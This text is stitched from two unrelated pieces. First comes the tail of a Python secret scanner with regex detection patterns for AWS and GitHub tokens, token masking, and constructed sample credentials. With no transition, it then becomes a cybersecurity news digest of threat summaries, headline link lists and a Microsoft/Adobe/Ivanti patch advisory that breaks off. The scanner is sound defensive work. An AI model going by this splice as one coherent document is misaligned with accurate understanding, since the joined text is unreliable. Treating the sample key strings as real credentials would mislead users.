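        r"([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])"
    ),
    # Classic GitHub tokens: ghp_/gho_/ghu_/ghs_/ghr_ + 36 alphanumerics
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    # Fine-grained personal access tokens
    "github_fine_grained_pat": re.compile(r"\bgithub_pat_[A-Za-z0-9_]{22,}\b"),
}


@dataclass(frozen=True)
class Finding:
    kind: str
    line_no: int
    masked: str  # never record the full secret in scanner output or logs


def mask(token: str) -> str:
    """Keep enough of the token to identify it, hide the rest."""
    return token[:4] + "*" * (len(token) - 8) + token[-4:]


def scan_text(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            for m in pattern.finditer(line):
                # Patterns with a capture group carry the secret in group 1
                token = m.group(m.lastindex) if m.lastindex else m.group(0)
                # Vendor documentation placeholders contain "EXAMPLE"; skip them
                if "EXAMPLE" in token.upper():
                    continue
                findings.append(Finding(kind, line_no, mask(token)))
    return findings


def scan_files(paths: list[Path]) -> dict[Path, list[Finding]]:
    """Return only the files that contain findings."""
    results = {}
    for path in paths:
        hits = scan_text(path.read_text(errors="replace"))
        if hits:
            results[path] = hits
    return results


# Constructed sample input for this example; none of these are live credentials
SAMPLE = """\
# constructed sample file for the example
AWS_ACCESS_KEY_ID = "AKIAQ4ZT7XY2BC9DE8FG"
aws_secret_access_key = "k3Lm9QpR2sT7uV0wX4yZ8aB1cD5eF6gH0iJ2kL9m"
GITHUB_TOKEN = "ghp_aB3dE6fG9hJ2kL5mN8pQ1rS4tU7vW0xYz9Ab"
# docs placeholder, should be ignored: AKIAIOSFODNN7EXAMPLE
region = "eu-west-2"
"""


def main(argv: list[str]) -> int:
    """Exit non-zero when anything is found, so it works as a pre-commit hook."""
    if not argv:
        hits = scan_text(SAMPLE)
        for f in hits:
            print(f"<sample>:{f.line_no}: {f.kind} {f.masked}")
        return 1 if hits else 0
    results = scan_files([Path(p) for p in argv])
    for path, hits in results.items():
        for f in hits:
            print(f"{path}:{f.line_no}: {f.kind} {f.masked}")
    return 1 if results else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Run with no arguments to scan the built-in sample, or pass file paths (for example the staged files in a pre-commit hook). A hit means the credential must be treated as compromised and rotated at the provider, not merely deleted from the file: once a token has been committed it remains in the repository history, which is exactly where attackers look.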
Cyber Criminals Target Smaller Firms as Larger Companies Beef Up Security
Cyber criminals are increasingly targeting small and medium enterprises (SMEs), as larger organisations strengthen their cyber security measures and refuse to pay ransoms. In 2023, SMEs accounted for nearly half of all recorded incidents, a significant rise. While only 10% of large organisations paid ransoms, 44% of SMEs paid between $25,000 and $100,000. The financial and reputational impact on SMEs can be devastating, and many struggle to recover from such attacks.
The Rise of Deepfakes Means CEOs Need to Rethink Trust
Kroll’s recent report highlights a sharp rise in social engineering attacks, which have grown from 7% to 20% of all cyber security threats in just two quarters. Alarmingly, 43% of successful cyber attacks are now linked to social engineering, driven by the use of AI technologies like deepfakes. Corporate leaders are particularly vulnerable, with AI models capable of mimicking them using information freely available online. As businesses adjust to this new reality, CEOs must rethink the concept of trust and implement stronger measures to combat AI-enabled impersonation. This is an arms race that no one can avoid being a part of. What we can do is get smart about trust, and the first step to take is building the right context for it.
What now? Ransomware Victim Pays Hacker, but Decryption Key Fails
A security firm recently intervened in a ransomware attack involving the Hazard ransomware, where a company paid the ransom but received a faulty decryptor. A bug in the ransomware’s encryption process caused files to be doubly encrypted, leading to missing bytes necessary for decryption. Despite escalating the issue to the cyber criminals, no working solution was provided. The cyber firm’s researchers eventually resolved the issue using a brute-force method to recover the files. This case highlights the risks of paying ransoms, as unreliable decryptors are not uncommon. Best practices, including robust data backups, remain critical to mitigating ransomware incidents.
UK Regulator to Significantly Reduce Maximum Fraud Losses Banks are Forced to Cover
UK regulators are expected to reduce the proposed fraud reimbursement limit for banks and payment companies from £415,000 to £85,000, following concerns from ministers and fintech firms. The Payment Systems Regulator had initially planned the higher cap, but industry bodies like UK Finance warned it could lead to exploitation and harm smaller firms. In 2023, Britons lost £459 million to authorised push payment (APP) fraud, making the issue critical for consumer protection. A consultation on the lower limit is expected soon, aiming to balance protection for scam victims with industry sustainability.
Enterprise Mobile Devices See Increased Attacks
Lookout’s latest report on the mobile threat landscape reveals a 40% increase in mobile phishing attempts and malicious web attacks targeting enterprises. Over 80,000 malicious apps were detected on enterprise mobile devices, ranging from riskware to sophisticated spyware capable of stealing data and eavesdropping. The most common vulnerabilities are found in mobile browsers, with attackers exploiting unpatched versions. Lookout highlights that mobile device management (MDM) solutions, while essential, should be complemented by mobile threat defence (MTD) solutions to effectively safeguard against phishing and malware, particularly with Android being heavily targeted by spyware, trojans and other malware.
Business Email Compromise Costs $55bn Over a Decade
The FBI has warned organisations about the increasing threat of business email compromise (BEC), a form of social engineering responsible for nearly $55bn in losses globally between October 2013 and December 2023. Over 305,000 incidents were recorded, with scammers impersonating legitimate entities, such as suppliers or executives, to trick victims into transferring large sums. In 2023, BEC scams saw a 9% increase in global losses, often funnelling funds through UK and Hong Kong banks, third-party payment processors, or cryptocurrency exchanges. The FBI urges victims to contact their banks immediately if they detect fraudulent transfers.
Half of IT Decision Makers Have Had to Recover Data from a Backup with a Third Unable to Make Full Recovery
An annual survey of IT security decision makers in the UK found that 50% of respondents had to rely on backups following a cyber attack, with 25% only achieving partial data recovery and 8% failing due to weak backup systems. The findings highlight the need for stronger backup strategies, with 9% of organisations admitting their current systems are insufficient for rapid recovery. However, progress is evident, with automated backups to central and personal repositories rising to 30% in 2024, up from 19% in 2023. The report underscores the importance of robust backup solutions in today’s cyber threat landscape.
Insurers and Asset Managers Continue to Invest in Longer Term Cyber Security Planning: Moody’s
Moody’s recent report highlights that insurers and asset managers have significantly increased their cyber security investments, with spending rising by over 50% between 2019 and 2023 in response to the growing frequency of cyber attacks. The Americas saw the largest increase at 65%, followed by EMEA at 51% and APAC at 48%. Additionally, the share of IT budgets dedicated to cyber risk grew to 8% in 2023, and the number of cyber security employees rose by 23% from 2019 to 2022.
Russia's Top-Secret Military Unit Reportedly Plots Undersea Cable 'Sabotage’
US officials are increasingly concerned about Russia's naval activity near undersea cables, fearing potential sabotage by the General Staff Main Directorate for Deep Sea Research (GUGI). This unit, equipped with surface vessels, submarines, and naval drones, has reportedly been spotted near critical deep-sea infrastructure, raising alarms about the risk to fibre-optic cables that carry over 95% of international data. Sabotaging these cables could severely disrupt global communications. Recent reports also suggest Russian spy ships have been operating in Nordic waters, targeting both submarine cables and wind farms, further highlighting the growing threat.
Think You Could Never Fall Victim to Cyber Crime? Think Again
Bitdefender's 2024 Consumer Cybersecurity Assessment Report reveals that over 75% of individuals don’t believe they are targets for cyber criminals, with 37% convinced they aren't targeted at all. This misconception leaves people more vulnerable to cyber attacks, which can range from phishing and spyware to man-in-the-middle attacks. Hackers don’t just focus on large corporations; anyone can be a target, as personal information like email addresses and dates of birth hold value. Even experienced individuals can fall for scams, proving that everyone must remain vigilant against evolving threats, especially as attacks continue to grow in sophistication and scale.
Sources
https://securitybrief.co.nz/story/trustwave-highlights-critical-cyber-threats-to-financial-services
https://www.techspot.com/news/104700-ransomware-victim-paid-hacker-but-decryption-failed.html
https://www.ft.com/content/69611fac-03a2-4731-b12e-bf1583219270
https://betanews.com/2024/09/10/enterprise-mobile-devices-see-increased-attacks/
https://www.infosecurity-magazine.com/news/business-email-compromise-55bn/
https://www.theregister.com/2024/09/09/russia_readies_submarine_cable_sabotage/
https://www.makeuseof.com/how-everyone-is-potential-cybercrime-victim/
Governance, Risk and Compliance
Cybercriminals target SMEs as large companies beef up security - The Economic Times (indiatimes.com)
Businesses' preparedness against cyber threats beginning to shrink: Beazley - Reinsurance News
Global Study Finds Organizations Facing Cybersecurity Gaps (govtech.com)
Trustwave highlights critical cyber threats to financial services (securitybrief.co.nz)
How to Hire a CISO as Scrutiny Intensifies | Woodruff Sawyer - JDSupra
What savvy hiring execs look for in a CISO today | CSO Online
Cyber Staffing Shortages Remain CISOs' Biggest Challenge (darkreading.com)
Boards caught off guard as hackers exploit AI - CIR Magazine
Cyber threats put pressure on in-house legal chiefs (ft.com)
How to Strengthen and Improve Your Company's Security Posture - Security Boulevard
The Cybersecurity Cat-And-Mouse Game (forbes.com)
What are the cybersecurity trends shaping workforce management? | Business Law Donut
Cybersecurity Compliance and Beyond: How Protocols Drive Innovation and Growth - Security Boulevard
Building Security Culture: Taking Cybersecurity To Main Street | MSSP Alert
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware demands exponentially increase, averaging $1.5 Million this year | TechRadar
Top Types Of Cyber Extortion Scams And 7 Ways To Stay Safe (forbes.com)
Ransomware: Attacks Once More Nearing Peak Levels | Symantec Enterprise Blogs (security.com)
What now? Ransomware victim pays hacker, but decryption key fails | TechSpot
RomCom Group Exploiting Microsoft Office 0-day To Deploy Ransomware (cybersecuritynews.com)
Ransomware rocked healthcare, public services in August | TechTarget
NoName ransomware gang deploying RansomHub malware in recent attacks (bleepingcomputer.com)
RansomHub Serves Up LaZagne (informationsecuritybuzz.com)
Updated attack arsenal bolsters RansomHub stealth | SC Media (scmagazine.com)
Threat Operation Behind Cicada3301 Ransomware Delivery Examined | MSSP Alert
How Law Enforcement's Ransomware Strategies Are Evolving (darkreading.com)
How Can Individuals Protect Themselves From Ransomware Attacks? (informationsecuritybuzz.com)
Most Educational Organizations Paid More Than the Original (globenewswire.com)
Meow ransomware sees surge of activity post-overhaul • The Register
Should State Governments Ban Ransomware Payments? (govtech.com)
Ransomware Victims
What now? Ransomware victim pays hacker, but decryption key fails | TechSpot
Ransomware rocked healthcare, public services in August | TechTarget
Hunters claims to have ransomed ICBC London, stolen 6.6TB • The Register
Healthcare giant settles patient data theft lawsuit for $65M • The Register
Cyber crooks shut down some US, UK schools • The Register
Charles Darwin School Bromley closes due to cyber attack | News Shopper
Cyber attack-hit Tewkesbury Borough Council 'rebuilding services' - BBC News
Significant ransom payment by major Iranian IT firm underway | SC Media (scmagazine.com)
Tewkesbury council says systems still down after cyber attack - BBC News
TfL Cyber Attack Raises Data Security Concerns - Hayes Connor
Amateurish 'CosmicBeetle' Ransomware Stings Turkish SMBs (darkreading.com)
Phishing & Email Based Attacks
72% of BEC attacks were from free webmail domains | Security Magazine
Losses due to cryptocurrency and BEC scams are soaring - Help Net Security
Think You Could Never Fall Victim to Cybercrime? Think Again (makeuseof.com)
FBI: Reported cryptocurrency losses reached $5.6 billion in 2023 (bleepingcomputer.com)
Phishing in focus: Disinformation, election and identity fraud - Help Net Security
Sextortion scam now use your "cheating" spouse’s name as a lure (bleepingcomputer.com)
Alert notification as phishing bait | Kaspersky official blog
Phishers abuse HTTP refresh headers for deeper deception • The Register
How to prevent vendor email compromise attacks | TechTarget
No, your partner didn't cheat on you. Well, at least, when this email said so - Neowin
Business Email Compromise (BEC)/Email Account Compromise (EAC)
72% of BEC attacks were from free webmail domains | Security Magazine
Losses due to cryptocurrency and BEC scams are soaring - Help Net Security
FBI: Reported cryptocurrency losses reached $5.6 billion in 2023 (bleepingcomputer.com)
How to prevent vendor email compromise attacks | TechTarget
Other Social Engineering
UK regulator to slash maximum fraud losses banks are forced to cover (ft.com)
Losses due to cryptocurrency and BEC scams are soaring - Help Net Security
Think You Could Never Fall Victim to Cybercrime? Think Again (makeuseof.com)
FBI: Reported cryptocurrency losses reached $5.6 billion in 2023 (bleepingcomputer.com)
Inside Thailand's $2 Billion Scam Industry Now Targeting Americans - Newsweek
Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware (thehackernews.com)
Sextortion scam now use your "cheating" spouse’s name as a lure (bleepingcomputer.com)
No, your partner didn't cheat on you. Well, at least, when this email said so - Neowin
Lured by a Promising Job, He Was Forced to Scam People - The New York Times (nytimes.com)
Watch Out for This New LinkedIn Job Scam (tech.co)
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams (thehackernews.com)
Ongoing Lazarus Group campaign sets sights on blockchain pros | SC Media (scmagazine.com)
Artificial Intelligence
For security, we have to stop picking up the phone | TechCrunch
The Rise Of Deepfakes Means CEOs Need To Rethink Trust (forbes.com)
Why AI and Cybersecurity Are on a Collision Course (govtech.com)
US proposes requiring reporting for advanced AI, cloud providers (yahoo.com)
The Weaponization of AI and ML is Complicating the Digital Battlefield - Security Boulevard
Boards caught off guard as hackers exploit AI - CIR Magazine
Underground Demand for Malicious LLMs Is Robust (govinfosecurity.com)
Singapore moots legislation to outlaw use of deepfakes during elections | ZDNET
MI6 and CIA using Gen AI to combat tech-driven threats • The Register
AI cybersecurity needs to be as multi-layered as the system it's protecting - Help Net Security
Early adopters are deploying AI agents in the enterprise now, with scaled adoption in 2025 | ZDNET
2FA/MFA
6 ways hackers sidestep your two-factor authentication | PCWorld
WordPress Mandates Two-Factor Authentication for Plugin and Theme Developers (thehackernews.com)
Malware
US charges Russian military officers for unleashing wiper malware on Ukraine | Ars Technica
New malware shakes macOS security paradigm – hackers eying iPhones next | Cybernews
Google Users Warned Of Surging Malvertising Campaigns (searchenginejournal.com)
Beware Of Malicious Chrome Extension That Delivers Weaponized ZIP Archive (cybersecuritynews.com)
Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware (thehackernews.com)
Mustang Panda Feeds Worm-Driven USB Attack Strategy (darkreading.com)
How Remote Access Trojans Bypass Traditional Security Measures | HackerNoon
Threat Hunting Case Study: Uncovering FIN7 | Intel471
New Linux Malware Campaign Exploits Oracle Weblogic to Mine Cryptocurrency (thehackernews.com)
Earth Preta Evolves its Attacks with New Malware and Strategies | Trend Micro (US)
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams (thehackernews.com)
Android TV Box Malware, Vo1d, Infects Over A Million Devices Worldwide (informationsecuritybuzz.com)
Mobile
Enterprise mobile devices see increased attacks (betanews.com)
SpyAgent Android malware steals your crypto recovery phrases from images (bleepingcomputer.com)
New malware shakes macOS security paradigm – hackers eying iPhones next | Cybernews
Found: 280 Android apps that use OCR to steal cryptocurrency credentials | Ars Technica
Samsung’s Update Decision—Bad News Confirmed For Millions Of Galaxy Users (forbes.com)
Denial of Service/DoS/DDOS
Internet of Things – IoT
Smart home security advice. Ring, SimpliSafe, Swann, and Yale | Pen Test Partners
Android TV Box Malware, Vo1d, Infects Over A Million Devices Worldwide (informationsecuritybuzz.com)
Data Breaches/Leaks
Data breach victims skyrocket over 1,100%: How to protect yourself - CyberGuy
Why is the world witnessing a surge in data breaches? (betanews.com)
Threat Actor Claims Fortinet Data Breach via Third-Party Service (cybersecuritynews.com)
Cyber-crook leaks 20GB of data 'stolen' from Capgemini • The Register
Fortinet Confirms Data Breach (informationsecuritybuzz.com)
Understanding the Types of Cybersecurity Breaches - Security Boulevard
Therapy Sessions Exposed by Mental Health Care Firm’s Unsecured Database | WIRED
Car rental company Avis discloses a data breach (securityaffairs.com)
Popular French retailers confirm hackers stole customer data (therecord.media)
Payment gateway data breach affects 1.7 million credit card owners (bleepingcomputer.com)
300,000 Impacted by Data Breach at Car Rental Firm Avis - SecurityWeek
Organised Crime & Criminal Actors
Think You Could Never Fall Victim to Cyber Crime? Think Again (makeuseof.com)
Cyber skills for sale: what leaders can learn from the dark web - Raconteur
Analysis of thousands of channels reveals Telegram is flooded with criminal networks | TechSpot
Russian, Kazakhstani men living in Miami indicted over cybercrime training service | CyberScoop
Inside Thailand's $2 Billion Scam Industry Now Targeting Americans - Newsweek
In Wake of Durov Arrest, Some Cybercriminals Ditch Telegram (404media.co)
Threat Hunting Case Study: Uncovering FIN7 | Intel471
Comms Business - BT logs 2,000 signals of potential cyber attacks per second
Evasion Tactics Used By Cybercriminals To Fly Under The Radar - SecurityWeek
FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh Nationals (thehackernews.com)
Chinese hackers linked to cybercrime syndicate arrested in Singapore (bleepingcomputer.com)
Lured by a Promising Job, He Was Forced to Scam People - The New York Times (nytimes.com)
Cambodian senator sanctioned by US over cyber-scams • The Register
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Losses due to cryptocurrency and BEC scams are soaring - Help Net Security
FBI: Reported cryptocurrency losses reached $5.6 billion in 2023 (bleepingcomputer.com)
Found: 280 Android apps that use OCR to steal cryptocurrency credentials | Ars Technica
Indodax hacked for $22 million, Lazarus Group suspected | Invezz
New Linux Malware Campaign Exploits Oracle Weblogic to Mine Cryptocurrency (thehackernews.com)
Ongoing Lazarus Group campaign sets sights on blockchain pros | SC Media (scmagazine.com)
Insider Risk and Insider Threats
Why is employee surveillance and tracking on the rise?
Insurance
Competition Fueled by Strong Cyber Insurance Profitability, Pricing Declines (claimsjournal.com)
Cyber threat needs public sector response (emergingrisks.co.uk)
Cyber insurance set for explosive growth - Help Net Security
62% of Businesses Filed a Cyber Insurance Claim in Last 12 Months | MSSP Alert
Supply Chain and Third Parties
Scattered Spider Sets Sights on Finance, Insurance Firms’ Cloud Infrastructure | MSSP Alert
Threat Actor Claims Fortinet Data Breach via Third-Party Service (cybersecuritynews.com)
One More Tool Will Do It? Reflecting on the CrowdStrike Fallout (thehackernews.com)
Think rebuild, not recovery, after a supply chain attack (betanews.com)
The Rising Tide of Software Supply Chain Attacks (darkreading.com)
Why the CrowdStrike outage hit Delta so hard | Fortune
Cloud/SaaS
Scattered Spider Sets Sights on Finance, Insurance Firms’ Cloud Infrastructure | MSSP Alert
US proposes requiring reporting for advanced AI, cloud providers (yahoo.com)
Cloud security fears, rising costs, privacy concerns? | ITPro
Shining a Light on Shadow Apps: The Invisible Gateway to SaaS Data Breaches (thehackernews.com)
Microsoft 365 was down for thousands of users - here's what happened | ZDNET
Why cloud security strategy is changing to prioritise recovery - Raconteur
Outages
One More Tool Will Do It? Reflecting on the CrowdStrike Fallout (thehackernews.com)
Microsoft 365 was down for thousands of users - here's what happened | ZDNET
Microsoft, Cyber Firms Pursue Changes After CrowdStrike Outage (claimsjournal.com)
Why the CrowdStrike outage hit Delta so hard | Fortune
Identity and Access Management
Encryption
Is Your Business Ready For The Quantum Cybersecurity Threat? (informationsecuritybuzz.com)
The Quantum Leap in Cybersecurity: A New Era of Challenges (eetimes.eu)
Edward Snowden made China a quantum networking superpower • The Register
Linux and Open Source
Linux and open-source documentation is a mess: Here's the solution | ZDNET
How to Explain the Security Advantages of Open Source - The New Stack
Passwords, Credential Stuffing & Brute Force Attacks
Credential Theft Protection: Defending Your Organization’s Data | MSSP Alert
How to defend against brute force and password spray attacks (bleepingcomputer.com)
The $13 billion problem: Tackling the growing sophistication of account takeovers (betanews.com)
Social Media
Analysis of thousands of channels reveals Telegram is flooded with criminal networks | TechSpot
In Wake of Durov Arrest, Some Cybercriminals Ditch Telegram (404media.co)
Opinion | The Tide May Be Turning for Telegram, TikTok and X - The New York Times (nytimes.com)
US arrests leaders of alleged Telegram terrorist group - BBC News
Watch Out for This New LinkedIn Job Scam (tech.co)
Malvertising
Google Users Warned Of Surging Malvertising Campaigns (searchenginejournal.com)
Google abusing ad tech dominance, UK competition watchdog finds - BBC News
Regulations, Fines and Legislation
US proposes requiring reporting for advanced AI, cloud providers (yahoo.com)
In Wake of Durov Arrest, Some Cybercriminals Ditch Telegram (404media.co)
How to Hire a CISO as Scrutiny Intensifies | Woodruff Sawyer - JDSupra
Opinion | The Tide May Be Turning for Telegram, TikTok and X - The New York Times (nytimes.com)
US arrests leaders of alleged Telegram terrorist group - BBC News
Google abusing ad tech dominance, UK competition watchdog finds - BBC News
Malaysia introduces a new Cyber Security Act | Herbert Smith Freehills | Global law firm
Backup and Recovery
Half of IT Leaders Faced Backup Recovery & One-Third Failed (itsecuritywire.com)
Careers, Working in Cyber and Information Security
Global Study Finds Organizations Facing Cybersecurity Gaps (govtech.com)
Building a career where you have the power to do the most good (siliconrepublic.com)
Cyber skills for sale: what leaders can learn from the dark web - Raconteur
Internships can be a gold mine for cybersecurity hiring | CSO Online
Cyber Staffing Shortages Remain CISOs' Biggest Challenge (darkreading.com)
Why Breaking into Cybersecurity Isn’t as Easy as You Think - Security Boulevard
Mind the talent gap: Infosec jobs abound, but hiring is flat • The Register
10 Writing Tips for Cybersecurity Professionals (darkreading.com)
Law Enforcement Action and Take Downs
Russian, Kazakhstani men living in Miami indicted over cybercrime training service | CyberScoop
In Wake of Durov Arrest, Some Cybercriminals Ditch Telegram (404media.co)
US arrests leaders of alleged Telegram terrorist group - BBC News
How Law Enforcement's Ransomware Strategies Are Evolving (darkreading.com)
17-year-old arrested in connection with cyber attack on TfL | UK News | Sky News
Arrest made in NCA investigation into Transport for London cyber attack - National Crime Agency
FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh Nationals (thehackernews.com)
Chinese hackers linked to cybercrime syndicate arrested in Singapore (bleepingcomputer.com)
Misinformation, Disinformation and Propaganda
Russia’s election influence efforts show sophistication, officials say - The Washington Post
Russia focusing on US social media stars to covertly influence voters | Reuters
‘Guerrilla projects’: Russia revels in US allegations of media warfare | Media News | Al Jazeera
Phishing in focus: Disinformation, election and identity fraud - Help Net Security
The US is Preparing Criminal Charges in Iran Hack Targeting Trump, AP Sources Say - SecurityWeek
Cybersecurity, disinformation dominates hearing on elections | CyberScoop
Russia Trying to Sway Voters Toward Trump Using Influencers: Official - Business Insider
Gallup Poll Bugs Open Door to Election Misinformation (darkreading.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
The Biggest Cyber Warfare Attacks In Global Geopolitics (informationsecuritybuzz.com)
The Weaponization of AI and ML is Complicating the Digital Battlefield - Security Boulevard
Nation State Actors
China
Mustang Panda Feeds Worm-Driven USB Attack Strategy (darkreading.com)
Experts Identify 3 Chinese-Linked Clusters Behind Cyberattacks in Southeast Asia (thehackernews.com)
Chinese Tag Team APTs Keep Stealing Asian Gov't Secrets (darkreading.com)
Earth Preta Evolves its Attacks with New Malware and Strategies | Trend Micro (US)
TIDRONE Espionage Group Targets Taiwan Drone Makers in Cyber Campaign (thehackernews.com)
Edward Snowden made China a quantum networking superpower • The Register
House Committee Warns of Chinese Cranes' Threat to U.S. Port Security (gcaptain.com)
Hunters claims to have ransomed ICBC London, stolen 6.6TB • The Register
Chinese hackers linked to cybercrime syndicate arrested in Singapore (bleepingcomputer.com)
Portuguese government to continue ban on Chinese 5G equipment (techmonitor.ai)
Russia
Russia reportedly readies submarine cable 'sabotage' • The Register
Russia’s election influence efforts show sophistication, officials say - The Washington Post
Germany Accuses Russia’s GRU Military Intelligence of Cyberattacks on NATO, EU - The Moscow Times
NCSC Calls Out Cyber-Attacks From Russia's GRU (silicon.co.uk)
US charges Russian military officers for unleashing wiper malware on Ukraine | Ars Technica
US Offers $60 Million Bounty in Hunt for Russian Hackers - Newsweek
Western intelligence warns Russia targeting aid to Ukraine - Naval Technology (naval-technology.com)
‘Guerrilla projects’: Russia revels in US allegations of media warfare | Media News | Al Jazeera
Russia Trying to Sway Voters Toward Trump Using Influencers: Official - Business Insider
Russia focusing on US social media stars to covertly influence voters | Reuters
Wix to block Russian users starting September 12 (bleepingcomputer.com)
Iran
The Biggest Cyber Warfare Attacks In Global Geopolitics (informationsecuritybuzz.com)
Advisory warns of Iran ransomware threat (baselinemag.com)
The Iran cyber threat: Breaking down attack tactics | ITPro
The US is Preparing Criminal Charges in Iran Hack Targeting Trump, AP Sources Say - SecurityWeek
Significant ransom payment by major Iranian IT firm underway | SC Media (scmagazine.com)
North Korea
Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware (thehackernews.com)
Indodax hacked for $22 million, Lazarus Group suspected | Invezz
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams (thehackernews.com)
How not to hire a North Korean IT spy | CSO Online
Watch Out for This New LinkedIn Job Scam (tech.co)
Ongoing Lazarus Group campaign sets sights on blockchain pros | SC Media (scmagazine.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Commercial Spyware Use Roars Back Despite Sanctions (darkreading.com)
Predator Spyware Resurfaces: Renewed Threats And Global Implications (informationsecuritybuzz.com)
US arrests leaders of alleged Telegram terrorist group - BBC News
Bomb threats are cyber attack - News - Rádio RSI English (rtvs.sk)
Tools and Controls
AI cybersecurity needs to be as multi-layered as the system it's protecting - Help Net Security
Half of IT Leaders Faced Backup Recovery & One-Third Failed (itsecuritywire.com)
CTEM: The next frontier in cybersecurity | TechRadar
Top API risks and how to mitigate them | TechTarget
Credential Theft Protection: Defending Your Organization’s Data | MSSP Alert
Best practices for implementing the Principle of Least Privilege - Help Net Security
Inside the Secrets of Physical Penetration Testing | HackerNoon
Competition Fueled by Strong Cyber Insurance Profitability, Pricing Declines (claimsjournal.com)
6 ways hackers sidestep your two-factor authentication | PCWorld
Think rebuild, not recovery, after a supply chain attack (betanews.com)
Data centres to be given massive boost and protections from cyber criminals and IT blackouts - GOV.UK (www.gov.uk)
WordPress Mandates Two-Factor Authentication for Plugin and Theme Developers (thehackernews.com)
Cybersecurity Compliance and Beyond: How Protocols Drive Innovation and Growth - Security Boulevard
Cyber threat needs public sector response (emergingrisks.co.uk)
Cyber insurance set for explosive growth - Help Net Security
How Effective Threat Hunting Programs are Shaping Cybersecurity - Security Boulevard
8 key aspects of a mobile device security audit program | TechTarget
Why cloud security strategy is changing to prioritise recovery - Raconteur
MI6 and CIA using Gen AI to combat tech-driven threats • The Register
Other News
Cybercriminals target SMEs as large companies beef up security - The Economic Times (indiatimes.com)
Businesses' preparedness against cyber threats beginning to shrink: Beazley - Reinsurance News
The Escalating Threat of Cybercrime and the Urgent Need for Advanced Defenses (thefastmode.com)
ICO and NCA sign memorandum of understanding for further collaboration on cyber security | ICO
How to Strengthen and Improve Your Company's Security Posture - Security Boulevard
The Biggest Cybersecurity Threats Facing Small Businesses Today - DevX
Your travel guide to public Wi-Fi, security and privacy (securitybrief.co.nz)
Data centres deemed 'critical infrastructure' by government | NASDAQ:AMZN (proactiveinvestors.co.uk)
Rogue WHOIS server gives researcher superpowers no one should ever have | Ars Technica
Microsoft Office 2024 to disable ActiveX controls by default (bleepingcomputer.com)
New RAMBO attack steals data using RAM in air-gapped computers (bleepingcomputer.com)
Cyberattacks on US utilities surged 70% this year, says Check Point (yahoo.com)
The future of automotive cybersecurity: Treating vehicles as endpoints - Help Net Security
How higher ed can stay ahead of growing cyber threats - eCampus News
Cisco merch shoppers stung in CosmicSting attack • The Register
Shipping has left gates ‘wide open’ for cyber attacks | TradeWinds (tradewindsnews.com)
Vulnerability Management
Vulnerabilities
SonicWall SSLVPN access control flaw is now exploited in attacks (bleepingcomputer.com)
Cisco Patches High-Severity Vulnerabilities in Network Operating System - SecurityWeek
Veeam patches critical flaws, urges users to update (computing.co.uk)
Citrix Releases Security Updates for Citrix Workspace App for Windows | CISA
RomCom Group Exploiting Microsoft Office 0-day To Deploy Ransomware (cybersecuritynews.com)
Ivanti fixes maximum severity RCE bug in Endpoint Management software (bleepingcomputer.com)
Adobe Patches Critical, Code Execution Flaws in Multiple Products - SecurityWeek
Chrome 128 Update Resolves High-Severity Vulnerabilities - SecurityWeek
Intel Warns of 20+ Processor Vulnerabilities, Advises Firmware Updates - SecurityWeek
Adobe fixes Acrobat Reader zero-day with public PoC exploit (bleepingcomputer.com)
Palo Alto Networks Patches Dozens of Vulnerabilities - SecurityWeek
Zyxel fixes critical command injection flaw in EOL NAS devices (CVE-2024-6342) - Help Net Security
Microsoft fixes Windows Smart App Control zero-day exploited since 2018 (bleepingcomputer.com)
GitLab Patches Critical Flaw Allowing Unauthorized Pipeline Job Execution (thehackernews.com)
Samsung’s Update Decision—Bad News Confirmed For Millions Of Galaxy Users (forbes.com)
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 11 September 2024 – Microsoft Patch Tuesday, Adobe and Ivanti Security Updates
Executive summary
Microsoft’s September Patch Tuesday provides updates for 79 security issues across its product range, including four actively exploited zero-day vulnerabilities and one publicly disclosed zero-day. This week also saw Adobe fix 28 vulnerabilities across various products, and Ivanti address several critical severity vulnerabilities in its Endpoint Manager product and several high severity vulnerabilities in its Workspace Control and Cloud Services Appliance (CSA) products.
What’s the risk to me or my business?
The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisations data on the affected systems.
What can I do?
Black Arrow recommends applying the available security updates for all supported versions of the Microsoft, Adobe and Ivanti products that are impacted. The updates should be applied as soon as possible for the actively exploited vulnerabilities and for all other vulnerabilities with a critical severity rating.
Microsoft
Further details on specific updates within this Microsoft Patch Tuesday can be found here:
Adobe
Further details of the vulnerabilities in Adobe products can be found here under ‘Recent bulletins and advisories’:
https://helpx.adobe.com/security/security-bulletin.html
Ivanti
